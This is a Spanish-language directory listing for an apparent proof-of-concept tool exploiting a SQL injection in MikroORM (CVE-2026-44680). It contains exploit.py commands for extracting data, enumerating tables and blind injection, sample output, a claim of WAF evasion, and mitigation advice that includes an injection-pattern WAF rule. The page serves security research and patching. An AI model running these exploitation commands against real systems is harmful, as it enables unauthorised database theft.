Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — Herramienta PoC para CVE-2026-44680 que afecta a MikroORM ≤7.0.13. Explota la inyección de ruta JSON para extraer el contenido de la base de datos mediante ataques basados en UNION. Ofrece detección de vulnerabilidades, extracción automatizada de datos, enumeración de tablas y soporte para inyección ciega. Incluye integración de proxy para Burp Suite y técnicas de evasión de WAF. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Frameworks de Pruebas de PenetraciónEscáneres de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad WebSeguridad de Bases de Datos
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Herramienta PoC para CVE-2026-44680 que afecta a MikroORM ≤7.0.13. Explota la inyección de ruta JSON para extraer el contenido de la base de datos mediante ataques basados en UNION. Ofrece detección de vulnerabilidades, extracción automatizada de datos, enumeración de tablas y soporte para inyección ciega. Incluye integración de proxy para Burp Suite y técnicas de evasión de WAF.

Ver Repositorio
1hace 1 mesAún no revisado
Compartir

CVE-2026-44680 - Framework de Explotación de Inyección SQL de MikroORM

Python Version License Status CVSS

Herramienta Profesional de Prueba de Concepto para Investigadores de Seguridad


🔍 Descripción General

CVE-2026-44680 es una vulnerabilidad crítica de inyección SQL que afecta a MikroORM, un popular ORM de TypeScript para Node.js. Este framework de explotación proporciona a investigadores de seguridad y pentesters una herramienta profesional para detectar y explotar la vulnerabilidad.

Autor: Sudeepa Wanigarathna
Versión: 1.0.0
Clasificación: Herramienta Profesional de Investigación de Seguridad


🚨 Detalles de la Vulnerabilidad

Versiones Afectadas

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Causa Raíz

MikroORM no escapa correctamente las claves de ruta JSON controladas en tiempo de ejecución al construir consultas JSON_EXTRACT. Los atacantes pueden salir del contexto de la ruta JSON e inyectar código SQL arbitrario.


✨ Características


📦 Instalación

Requisitos Previos

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Pasos de Instalación

Paso 1: Clonar el Repositorio

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Paso 2: Instalar Dependencias

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Paso 3: Verificar la Instalación

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Inicio Rápido

Uso Básico

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Guía de Uso

Opciones de Comando

Comandos de Ejemplo

1. Explotación Completa

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. Endpoint Personalizado

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. Con Proxy (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Depuración Verbosa

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. Inyección Ciega

root@kitploit:~
python exploit.py -u http://target.com --blind

6. Solo Detección

root@kitploit:~
python exploit.py -u http://target.com --detect

7. Extraer Información de la Base de Datos

root@kitploit:~
python exploit.py -u http://target.com --extract

8. Enumerar Tablas

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 Ejemplos de Salida

Salida de Consola

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

Archivos Generados

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Mitigación

Acciones Inmediatas

1. Actualizar MikroORM

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Validación de Entrada

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. Reglas de WAF

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Endurecimiento de la Base de Datos

  • Aplicar el principio de mínimo privilegio
  • Usar usuarios de base de datos separados
  • Implementar registro de consultas
  • Habilitar la detección de inyección SQL

⚠️ Descargo de Responsabilidad

IMPORTANTE: Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos.

Aviso Legal

  • ✅ Debe tener permiso explícito antes de probar cualquier sistema
  • ✅ Usted es responsable de cualquier daño causado por un uso indebido
  • ✅ Úsela de forma ética y reporte las vulnerabilidades de manera responsable

Directrices de Uso Ético

  1. Autorización: Obtenga permiso por escrito del propietario del sistema
  2. Reporte: Reporte los hallazgos a los proveedores afectados de manera responsable
  3. Confidencialidad: No divulgue las vulnerabilidades hasta que se apliquen los parches
  4. Limitaciones: Manténgase dentro del alcance de las pruebas autorizadas

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 Referencias

  • Detalles de CVE-2026-44680
  • Aviso de Seguridad de MikroORM
  • Prevención de Inyección SQL de OWASP

Hecho con ❤️ para la Comunidad de Investigación de Seguridad

Reportar Error • Solicitar Funcionalidad • Añadir Estrella en GitHub

Descargar herramienta
AtributoValor
CVE IDCVE-2026-44680
Puntuación CVSS7.6 (Alta)
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosBajos
CaracterísticaDescripciónEstado
Detección de VulnerabilidadesDetección basada en tiempo y en errores✅
Extracción de Base de DatosVersión, base de datos, usuario, hostname✅
Enumeración de TablasDescubrimiento automático de todas las tablas✅
Inyección Basada en UNIONExtraer datos mediante UNION SELECT✅
Inyección CiegaExtracción de caracteres basada en booleanos✅
Soporte de ProxyBurp Suite / proxy de intercepción✅
Generación de InformesInformes TXT profesionales✅
Evasión de WAFTécnicas avanzadas de ofuscación✅
FlagDescripciónPor defecto
-u, --urlURL objetivo (obligatorio)-
-e, --endpointEndpoint de API/api/users/search
-p, --proxyProxy HTTPNinguno
-v, --verboseSalida verbosaFalso
--detectDetectar solo la vulnerabilidadFalso
--extractExtraer información de la base de datosFalso
--enumerateEnumerar tablasFalso
--blindModo de inyección ciegaFalso